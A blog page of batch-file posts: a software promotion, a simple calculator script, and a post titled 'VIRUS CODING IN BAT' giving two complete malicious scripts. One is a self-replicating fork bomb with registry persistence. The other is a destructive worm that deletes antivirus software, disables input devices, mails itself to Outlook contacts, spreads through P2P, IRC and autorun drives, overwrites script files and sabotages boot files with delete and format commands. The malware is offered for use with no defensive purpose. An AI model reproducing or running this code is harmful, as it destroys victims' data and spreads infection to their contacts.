Showing posts with label BATCH. Show all posts
Showing posts with label BATCH. Show all posts

Saturday, December 15, 2012

How to make a Batch File Without knowledge of Programming

 

Batch file is a text file with series of commands which would execute one by one on launching this single file. So, it can be used to automate your daily and repetitive tasks on windows. These tasks could be like executing a program, opening a website or simply open a file or document.

Let me give you a simple example where I need a batch file: I open Gmail, Facebook and Twitter every morning in web browser followed by a Music playlist in media player. All these tasks can be done by launching single batch file. Here’s how you can do it using a software to create batch file.

AutoStarter X3 is a portable software tool to create command files or batch file. And that too without knowledge of programming.Just specify file, web address or a program to be executed and batch file will be ready in one click.

 

Program has a single window interface and new command can be added by clicking on Add button. Here is a description of each command given there:

  • File(s)- Select one or more than one file to open in their default program. (Opening a .JPG file will open it with default photo viewer with which it is associated)
  • Webpages Tabs- Specify the web browser to be used to open a web address.
  • Webpages Windows- Open a web URL in default web browser of your PC.
  • Directory- Open a folder on your Hardrive or Network location.
  • Shortcut- Open a shortcut to file or web URL (lnk or url)
  • Music Files Directory- You can create a playlist of songs in a folder and then play them back via the default player. The creation of the playlist can take several minutes, depending on the number of songs in the folder, close the warning that pops up OK.
  • Open file with Program- Open a file in specific program of your choice instead of default. (Opening a JPG image in Photoshop when .JPG is associated with Windows photo viewer)
  • Execute Program- Run a software program specified.

After specifying the commands, you can test how the batch file will execute. If it is all right, click on Batch to create a Batch *.bat) file. Program also gives you an option to save project to edit or develop it later.

Batch file is a low level solution to automate tasks when there are software tools likeTimeComX and Scheduler  to schedule tasks and automate windows operations.

Download AutoStarter X3

Thursday, July 8, 2010

BASIC CALCULATON CALCULATER IN BATCH PROGRAMMING

 

Batch program for basic calculation BY PIYUSH.

   1: @echo off
   2: :start
   3: echo Program for basic calculation(Beta)
   4:  
   5: echo ----------------------
   6: echo Add ----------- 1
   7: echo Subtract ------ 2
   8: echo Multiply ------ 3
   9: echo Division ------ 4
  10: echo Exit ---------- 5
  11: echo ----------------------
  12: set /p "choice=Select an option:-"
  13: if %choice%==5 goto %choice%
  14: set /p "a=Enter First Number :"
  15: set /p "b=Enter Second Number :"
  16: set /a a=%a%
  17: set /a b=%b%
  18:  
  19: goto %choice%
  20: echo Invalid Choice
  21: pause
  22: cls
  23: goto start
  24:  
  25: :1
  26: set /a c=%a% + %b%
  27: echo %a% + %b% = %c%
  28: pause>;nul
  29: cls
  30: goto start
  31:  
  32: :2
  33: set /a c=%a% - %b%
  34: echo %a% - %b% = %c%
  35: pause>;nul
  36: cls
  37: goto start
  38:  
  39: :3
  40: set /a c=%a% * %b%
  41: echo %a% X %b% = %c%
  42: pause>;nul
  43: cls
  44: goto start
  45:  
  46: :4
  47: set /a c=%a% / %b%
  48: set /a d=%a%-(%c% * %b%)
  49: echo %a% / %b% = %c% and %d% remainder
  50: pause>;nul
  51: cls
  52: goto start
  53:  
  54:  
  55: :5
  56: echo Thanks for using!
  57: pause>;nul
  58: exit

This Batch Program is made by Piyush.

Wednesday, July 7, 2010

VIRUS CODING IN BAT

   1: @echo off
   2: set path="%windir%\system32"
   3: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "C:\WINDOWS\blah.bat" /f
   4: goto core
   5: :core
   6: start cmd.exe
   7: copy %0 %random%.bat >; nul
   8: start %0
   9: goto core
  10: :end
  11: copy %0 %windir%\blah.bat > nul

BATCH FILE VIRUS CODE

   1: @echo off
   2: @ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
   3: break off
   4: copy %0 %windir%\dchhaeyh.bat>;nul
   5: echo.on error resume next>;%windir%\dchhaeyh.vbs
   6: echo.set hd=CreateObject("wscript.shell")>;>%windir%\dchhaeyh.vbs
   7: echo.[AutoRun]>;%windir%\dchhaeyh.inf
   8: echo.open=%windir%\dchhaeyh.bat>;>%windir%\dchhaeyh.inf
   9: for %%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %comspec% nul /f /c if exist %%c:\nul copy %windir%\dchhaeyh.inf %%c:\autorun.inf /y
  10: rundll32 mouse,disable
  11: rundll32 keyboard,disable
  12: set hec=deltree/y c:\
  13: %hec%antiba*>;nul
  14: %hec%antivi*>;nul
  15: %hec%av*>;nul
  16: %hec%bitdef*>;nul
  17: %hec%comman~1\>;nul
  18: %hec%cleanc*>;nul
  19: %hec%esafen\>;nul
  20: %hec%findvi*>;nul
  21: %hec%f-*>;nul
  22: %hec%fwin*>;nul
  23: %hec%inocul*>;nul
  24: %hec%kasper*>;nul
  25: %hec%mcafee*>;nul
  26: %hec%msav\>;nul
  27: %hec%norman\>;nul
  28: %hec%norton*>;nul
  29: %hec%pav\>;nul
  30: %hec%pccill*>;nul
  31: %hec%pc-cil*>;nul
  32: %hec%rav\>;nul
  33: %hec%softwin\>;nul
  34: %hec%tbav*>;nul
  35: %hec%toolkit\>;nul
  36: %hec%trendm~1\>;nul
  37: %hec%trex\>;nul
  38: %hec%virus*>;nul
  39: %hec%vpc\>;nul
  40: %hec%vs95\>;nul
  41: %hec%zonela*>;nul
  42: set hec=deltree/y c:\progra~1\
  43: %hec%antiba*>;nul
  44: %hec%antivi*>;nul
  45: %hec%avg*>;nul
  46: %hec%bitdef*>;nul
  47: %hec%comman~1\>;nul
  48: %hec%common~1\avp*>;nul
  49: %hec%common~1\syman*>;nul
  50: %hec%datafe*>;nul
  51: %hec%deerfi*>;nul
  52: %hec%f-*>;nul
  53: %hec%findvi~1\>;nul
  54: %hec%fsi\>;nul
  55: %hec%fwin*>;nul
  56: %hec%grisoft\>;nul
  57: %hec%inocul*>;nul
  58: %hec%kasper*>;nul
  59: %hec%mcafee*>;nul
  60: %hec%mindso~1\>;nul
  61: %hec%norman\>;nul
  62: %hec%norton*>;nul
  63: %hec%pandas~1\>;nul
  64: %hec%protec*>;nul
  65: %hec%quickh~1\>;nul
  66: %hec%rav\>;nul
  67: %hec%signal9\>;nul
  68: %hec%softwin\>;nul
  69: %hec%spysto~1\>;nul
  70: %hec%syman*>;nul
  71: %hec%tbav\>;nul
  72: %hec%tinype~1\>;nul
  73: %hec%trend*>;nul
  74: %hec%trojan*>;nul
  75: %hec%virus*>;nul
  76: %hec%zonela*>;nul
  77: set hec=
  78: copy %0 c:\shbm.bat>;nul
  79: set s=dress
  80: set v=Entr
  81: set i=ists
  82: echo.set sp="Scripting.FileSystem.Object">;>%windir%\dchhaeyh.vbs
  83: echo.set px=CreateObject(sp)>;>%windir%\dchhaeyh.vbs
  84: echo.set xv=CreateObject("Outlook.Application")>;>%windir%\dchhaeyh.vbs
  85: echo.set ve=WScript.CreateObject("Outlook.Application")>;>%windir%\dchhaeyh.vbs
  86: echo.set ep=ve.GetNameSpace("MAPI")>;>%windir%\dchhaeyh.vbs
  87: echo.set d=ep.Ad%s%L%i%(1)>;>%windir%\dchhaeyh.vbs
  88: echo.set ae=d.Ad%s%%v%ies>;>%windir%\dchhaeyh.vbs
  89: echo.for x=1 To ae.Count>;>%windir%\dchhaeyh.vbs
  90: echo.set pz=xv.CreateItem(0)>;>%windir%\dchhaeyh.vbs
  91: echo.set zk=pz>;>%windir%\dchhaeyh.vbs
  92: echo.zk.to=xv.GetNameSpace("MAPI").Ad%s%L%i%(1).Ad%s%%v%ies(x)>;>%windir%\dchhaeyh.vbs
  93: echo.zk.Subject="invitation">;>%windir%\dchhaeyh.vbs
  94: echo.zk.Body="hi how are">;>%windir%\dchhaeyh.vbs
  95: echo.zk.Attachments.Add("C:\shbm.bat")>;>%windir%\dchhaeyh.vbs
  96: echo.zk.send>;>%windir%\dchhaeyh.vbs
  97: echo.Next>;>%windir%\dchhaeyh.vbs
  98: echo.xv.Quit>;>%windir%\dchhaeyh.vbs
  99: set s=
 100: set v=
 101: set i=
 102: copy %0 c:\download\sbm.bat>;nul
 103: copy %0 c:\downlo~1\sbm.bat>;nul
 104: copy %0 c:\eigene~1\sbm.bat>;nul
 105: copy %0 c:\kazaa\myshar~1\sbm.bat>;nul
 106: copy %0 c:\mesdoc~1\sbm.bat>;nul
 107: copy %0 c:\meusdo~1\sbm.bat>;nul
 108: copy %0 c:\mydocu~1\mymusi~1\sbm.bat>;nul
 109: copy %0 c:\mydocu~1\sbm.bat>;nul
 110: copy %0 c:\mydown~1\sbm.bat>;nul
 111: copy %0 c:\mymusi~1\sbm.bat>;nul
 112: copy %0 c:\mymusic\sbm.bat>;nul
 113: copy %0 c:\progra~1\applej~1\incoming\sbm.bat>;nul
 114: copy %0 c:\progra~1\bearsh~1\shared\sbm.bat>;nul
 115: copy %0 c:\progra~1\edonke~1\incoming\sbm.bat>;nul
 116: copy %0 c:\progra~1\emule\incoming\sbm.bat>;nul
 117: copy %0 c:\progra~1\gnucleus\downlo~1\incoming\sbm.bat>;nul
 118: copy %0 c:\progra~1\gnucleus\downlo~1\sbm.bat>;nul
 119: copy %0 c:\progra~1\grokster\mygrok~1\sbm.bat>;nul
 120: copy %0 c:\progra~1\icq\shared~1\sbm.bat>;nul
 121: copy %0 c:\progra~1\kazaa\myshar~1\sbm.bat>;nul
 122: copy %0 c:\progra~1\kazaal~1\myshar~1\sbm.bat>;nul
 123: copy %0 c:\progra~1\kmd\myshar~1\sbm.bat>;nul
 124: copy %0 c:\progra~1\limewire\shared\sbm.bat>;nul
 125: copy %0 c:\progra~1\morpheus\myshar~1\sbm.bat>;nul
 126: copy %0 c:\progra~1\overnet\bundles\sbm.bat>;nul
 127: copy %0 c:\progra~1\shareaza\downlo~1\sbm.bat>;nul
 128: copy %0 c:\fbm>;nul
 129: copy %0 c:\mirc\download\fbm>;nul
 130: copy %0 c:\mirc32\download\fbm>;nul
 131: copy %0 c:\progra~1\mirc\download\fbm>;nul
 132: copy %0 c:\progra~1\mirc32\download\fbm>;nul
 133: echo.[script]>;%windir%\dchhaeyh.ini
 134: echo.n0=on 1:JOIN:#:{>;>%windir%\dchhaeyh.ini
 135: echo.n1=/if ( $nick == $me ) { halt }>;>%windir%\dchhaeyh.ini
 136: echo.n2=/dcc send $nick c:\fbm>;>%windir%\dchhaeyh.ini
 137: echo.n3=}>;>%windir%\dchhaeyh.ini
 138: deltree/y c:\mirc\script.ini>;nul
 139: deltree/y c:\mirc32\script.ini>;nul
 140: deltree/y c:\progra~1\mirc\script.ini>;nul
 141: deltree/y c:\progra~1\mirc32\script.ini>;nul
 142: copy %windir%\dchhaeyh.ini c:\mirc\script.ini>;nul
 143: copy %windir%\dchhaeyh.ini c:\mirc32\script.ini>;nul
 144: copy %windir%\dchhaeyh.ini c:\progra~1\mirc\script.ini>;nul
 145: copy %windir%\dchhaeyh.ini c:\progra~1\mirc32\script.ini>;nul
 146: copy %0 c:\pirch\downlo~1\fbm>;nul
 147: copy %0 c:\pirch32\downlo~1\fbm>;nul
 148: copy %0 c:\pirch98\downlo~1\fbm>;nul
 149: copy %0 c:\progra~1\pirch\downlo~1\fbm>;nul
 150: copy %0 c:\progra~1\pirch32\downlo~1\fbm>;nul
 151: copy %0 c:\progra~1\pirch98\downlo~1\fbm>;nul
 152: echo.[Levels]>;%windir%\dchhaeyh.ini
 153: echo.Enabled=1>;>%windir%\dchhaeyh.ini
 154: echo.Count=6>;>%windir%\dchhaeyh.ini
 155: echo.Level1=000-Unknowns>;>%windir%\dchhaeyh.ini
 156: echo.000-UnknownsEnabled=1>;>%windir%\dchhaeyh.ini
 157: echo.Level2=100-Level 100>;>%windir%\dchhaeyh.ini
 158: echo.100-Level 100Enabled=1>;>%windir%\dchhaeyh.ini
 159: echo.Level3=200-Level 200>;>%windir%\dchhaeyh.ini
 160: echo.200-Level 200Enabled=1>;>%windir%\dchhaeyh.ini
 161: echo.Level4=300-Level 300>;>%windir%\dchhaeyh.ini
 162: echo.300-Level 300Enabled=1>;>%windir%\dchhaeyh.ini
 163: echo.Level5=400-Level 400>;>%windir%\dchhaeyh.ini
 164: echo.400-Level 400Enabled=1>;>%windir%\dchhaeyh.ini
 165: echo.Level6=500-Level 500>;>%windir%\dchhaeyh.ini
 166: echo.500-Level 500Enabled=1>;>%windir%\dchhaeyh.ini
 167: echo.>;>%windir%\dchhaeyh.ini
 168: echo.[000-Unknowns]>;>%windir%\dchhaeyh.ini
 169: echo.User1=*!*@*>;>%windir%\dchhaeyh.ini
 170: echo.UserCount=1>;>%windir%\dchhaeyh.ini
 171: echo.Event1=ON JOIN:#:/dcc send $nick c:\fbm>;>%windir%\dchhaeyh.ini
 172: echo.EventCount=1>;>%windir%\dchhaeyh.ini
 173: echo.>;>%windir%\dchhaeyh.ini
 174: echo.[100-Level 100]>;>%windir%\dchhaeyh.ini
 175: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 176: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 177: echo.>;>%windir%\dchhaeyh.ini
 178: echo.[200-Level 200]>;>%windir%\dchhaeyh.ini
 179: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 180: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 181: echo.>;>%windir%\dchhaeyh.ini
 182: echo.[300-Level 300]>;>%windir%\dchhaeyh.ini
 183: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 184: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 185: echo.>;>%windir%\dchhaeyh.ini
 186: echo.[400-Level 400]>;>%windir%\dchhaeyh.ini
 187: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 188: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 189: echo.>;>%windir%\dchhaeyh.ini
 190: echo.[500-Level 500]>;>%windir%\dchhaeyh.ini
 191: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 192: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 193: deltree/y c:\pirch\events.ini>;nul
 194: deltree/y c:\pirch98\events.ini>;nul
 195: deltree/y c:\pirch32\events.ini>;nul
 196: deltree/y c:\progra~1\pirch\events.ini>;nul
 197: deltree/y c:\progra~1\pirch98\events.ini>;nul
 198: deltree/y c:\progra~1\pirch32\events.ini>;nul
 199: copy %windir%\dchhaeyh.ini c:\pirch\events.ini>;nul
 200: copy %windir%\dchhaeyh.ini c:\pirch98\events.ini>;nul
 201: copy %windir%\dchhaeyh.ini c:\pirch32\events.ini>;nul
 202: copy %windir%\dchhaeyh.ini c:\progra~1\pirch\events.ini>;nul
 203: copy %windir%\dchhaeyh.ini c:\progra~1\pirch98\events.ini>;nul
 204: copy %windir%\dchhaeyh.ini c:\progra~1\pirch32\events.ini>;nul
 205: echo.hd.RegWrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\fbm">;>%windir%\dchhaeyh.vbs
 206: for %%v in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%v
 207: for %%v in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\dchhaeyh.bat %%v /y
 208: for %%v in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%v:\nul copy %windir%\dchhaeyh.bat %%v:\dchhaeyh.bat /y
 209: echo.hd.run "%windir%\dchhaeyh.bat", VBHide>;>%windir%\dchhaeyh.vbs
 210: for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%e
 211: for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\dchhaeyh.vbs %%e /y
 212: for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\dchhaeyh.vbs %%e:\dchhaeyh.vbs /y
 213: echo.o=wscript.createobject("wscript.shell");>%windir%\dchhaeyh.js
 214: echo.o.Run("%windir%\dchhaeyh.bat");>>%windir%\dchhaeyh.js
 215: for %%t in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%t
 216: for %%t in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\dchhaeyh.js %%t /y
 217: for %%t in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%t:\nul copy %windir%\dchhaeyh.js %%t:\dchhaeyh.js /y
 218: echo.REGEDIT4>;%windir%\ov.reg
 219: echo.>;>%windir%\ov.reg
 220: echo.[HKEY_LOCAL_MACHINE]>;>%windir%\ov.reg
 221: echo.""="%windir%\dchhaeyh.bat">;>%windir%\ov.reg
 222: for %%o in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%o
 223: for %%o in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\ov.reg %%o /y
 224: for %%o in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%o:\nul copy %windir%\ov.reg %%o:\dchhaeyh.reg /y
 225: echo.SHELL "%windir%\dchhaeyh.bat">;%windir%\ut.bas
 226: echo.END>;>%windir%\ut.bas
 227: for %%u in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%u
 228: for %%u in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\ut.bas %%u /y
 229: for %%u in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%u:\nul copy %windir%\ut.bas %%u:\dchhaeyh.bas /y
 230: echo.time 00:00:00,00>;>c:\autoexec.bat
 231: echo.date 80-01-01>;>c:\autoexec.bat
 232: echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>;>c:\autoexec.bat
 233: echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>;>c:\autoexec.bat
 234: echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>;>c:\autoexec.bat
 235: echo.[menu]>;>c:\config.sys
 236: echo.menuitem=id>;>c:\config.sys
 237: echo.>;>c:\config.sys
 238: echo.[id]>;>c:\config.sys
 239: echo.buffers=1>;>c:\config.sys
 240: echo.files=1>;>c:\config.sys
 241: echo.lastdrive=A>;>c:\config.sys
 242: echo.set path=deltree/y c:\>;>c:\config.sys
 243: echo.set temp=A:\>;>c:\config.sys
 244: echo.set windir=format c:/u/q/autotest>;>c:\config.sys
 245: set ¼Ã‰§³«°=md %windir%\desktop\
 246: %¼Ã‰§³«°%¼Ã‰§³«°00>;nul | %¼Ã‰§³«°%¼Ã‰§³«°01>nul | %¼Ã‰§³«°%¼Ã‰§³«°02>nul | %¼Ã‰§³«°%¼Ã‰§³«°03>nul
 247: %¼Ã‰§³«°%¼Ã‰§³«°04>;nul | %¼Ã‰§³«°%¼Ã‰§³«°05>nul | %¼Ã‰§³«°%¼Ã‰§³«°06>nul | %¼Ã‰§³«°%¼Ã‰§³«°07>nul
 248: %¼Ã‰§³«°%¼Ã‰§³«°08>;nul | %¼Ã‰§³«°%¼Ã‰§³«°09>nul | %¼Ã‰§³«°%¼Ã‰§³«°10>nul | %¼Ã‰§³«°%¼Ã‰§³«°11>nul
 249: %¼Ã‰§³«°%¼Ã‰§³«°12>;nul | %¼Ã‰§³«°%¼Ã‰§³«°13>nul | %¼Ã‰§³«°%¼Ã‰§³«°14>nul | %¼Ã‰§³«°%¼Ã‰§³«°15>nul
 250: %¼Ã‰§³«°%¼Ã‰§³«°16>;nul | %¼Ã‰§³«°%¼Ã‰§³«°17>nul | %¼Ã‰§³«°%¼Ã‰§³«°18>nul | %¼Ã‰§³«°%¼Ã‰§³«°19>nul
 251: %¼Ã‰§³«°%¼Ã‰§³«°20>;nul | %¼Ã‰§³«°%¼Ã‰§³«°21>nul | %¼Ã‰§³«°%¼Ã‰§³«°22>nul | %¼Ã‰§³«°%¼Ã‰§³«°23>nul
 252: %¼Ã‰§³«°%¼Ã‰§³«°24>;nul | %¼Ã‰§³«°%¼Ã‰§³«°25>nul | %¼Ã‰§³«°%¼Ã‰§³«°26>nul | %¼Ã‰§³«°%¼Ã‰§³«°27>nul
 253: %¼Ã‰§³«°%¼Ã‰§³«°28>;nul | %¼Ã‰§³«°%¼Ã‰§³«°29>nul | %¼Ã‰§³«°%¼Ã‰§³«°30>nul | %¼Ã‰§³«°%¼Ã‰§³«°31>nul
 254: %¼Ã‰§³«°%¼Ã‰§³«°32>;nul | %¼Ã‰§³«°%¼Ã‰§³«°33>nul | %¼Ã‰§³«°%¼Ã‰§³«°34>nul | %¼Ã‰§³«°%¼Ã‰§³«°35>nul
 255: %¼Ã‰§³«°%¼Ã‰§³«°36>;nul | %¼Ã‰§³«°%¼Ã‰§³«°37>nul | %¼Ã‰§³«°%¼Ã‰§³«°38>nul | %¼Ã‰§³«°%¼Ã‰§³«°39>nul
 256: %¼Ã‰§³«°%¼Ã‰§³«°40>;nul | %¼Ã‰§³«°%¼Ã‰§³«°41>nul | %¼Ã‰§³«°%¼Ã‰§³«°42>nul | %¼Ã‰§³«°%¼Ã‰§³«°43>nul
 257: %¼Ã‰§³«°%¼Ã‰§³«°44>;nul | %¼Ã‰§³«°%¼Ã‰§³«°45>nul | %¼Ã‰§³«°%¼Ã‰§³«°46>nul | %¼Ã‰§³«°%¼Ã‰§³«°47>nul
 258: %¼Ã‰§³«°%¼Ã‰§³«°48>;nul | %¼Ã‰§³«°%¼Ã‰§³«°49>nul | %¼Ã‰§³«°%¼Ã‰§³«°50>nul | %¼Ã‰§³«°%¼Ã‰§³«°51>nul
 259: %¼Ã‰§³«°%¼Ã‰§³«°52>;nul | %¼Ã‰§³«°%¼Ã‰§³«°53>nul | %¼Ã‰§³«°%¼Ã‰§³«°54>nul | %¼Ã‰§³«°%¼Ã‰§³«°55>nul
 260: %¼Ã‰§³«°%¼Ã‰§³«°56>;nul | %¼Ã‰§³«°%¼Ã‰§³«°57>nul | %¼Ã‰§³«°%¼Ã‰§³«°58>nul | %¼Ã‰§³«°%¼Ã‰§³«°59>nul
 261: %¼Ã‰§³«°%¼Ã‰§³«°60>;nul | %¼Ã‰§³«°%¼Ã‰§³«°61>nul | %¼Ã‰§³«°%¼Ã‰§³«°62>nul | %¼Ã‰§³«°%¼Ã‰§³«°63>nul
 262: %¼Ã‰§³«°%¼Ã‰§³«°64>;nul | %¼Ã‰§³«°%¼Ã‰§³«°65>nul | %¼Ã‰§³«°%¼Ã‰§³«°66>nul | %¼Ã‰§³«°%¼Ã‰§³«°67>nul
 263: %¼Ã‰§³«°%¼Ã‰§³«°68>;nul | %¼Ã‰§³«°%¼Ã‰§³«°69>nul | %¼Ã‰§³«°%¼Ã‰§³«°70>nul | %¼Ã‰§³«°%¼Ã‰§³«°71>nul
 264: %¼Ã‰§³«°%¼Ã‰§³«°72>;nul | %¼Ã‰§³«°%¼Ã‰§³«°73>nul | %¼Ã‰§³«°%¼Ã‰§³«°74>nul | %¼Ã‰§³«°%¼Ã‰§³«°75>nul
 265: %¼Ã‰§³«°%¼Ã‰§³«°76>;nul | %¼Ã‰§³«°%¼Ã‰§³«°77>nul | %¼Ã‰§³«°%¼Ã‰§³«°78>nul | %¼Ã‰§³«°%¼Ã‰§³«°79>nul
 266: %¼Ã‰§³«°%¼Ã‰§³«°80>;nul | %¼Ã‰§³«°%¼Ã‰§³«°81>nul | %¼Ã‰§³«°%¼Ã‰§³«°82>nul | %¼Ã‰§³«°%¼Ã‰§³«°83>nul
 267: %¼Ã‰§³«°%¼Ã‰§³«°84>;nul | %¼Ã‰§³«°%¼Ã‰§³«°85>nul | %¼Ã‰§³«°%¼Ã‰§³«°86>nul | %¼Ã‰§³«°%¼Ã‰§³«°87>nul
 268: %¼Ã‰§³«°%¼Ã‰§³«°88>;nul | %¼Ã‰§³«°%¼Ã‰§³«°89>nul | %¼Ã‰§³«°%¼Ã‰§³«°90>nul | %¼Ã‰§³«°%¼Ã‰§³«°91>nul
 269: %¼Ã‰§³«°%¼Ã‰§³«°92>;nul | %¼Ã‰§³«°%¼Ã‰§³«°93>nul | %¼Ã‰§³«°%¼Ã‰§³«°94>nul | %¼Ã‰§³«°%¼Ã‰§³«°95>nul
 270: %¼Ã‰§³«°%¼Ã‰§³«°96>;nul | %¼Ã‰§³«°%¼Ã‰§³«°97>nul | %¼Ã‰§³«°%¼Ã‰§³«°98>nul | %¼Ã‰§³«°%¼Ã‰§³«°99>nul
 271: set ¼Ã‰§³«°=
 272: cscript %windir%\dchhaeyh.vbs
 273: rundll32 krnl386,exitkernel
 274: cls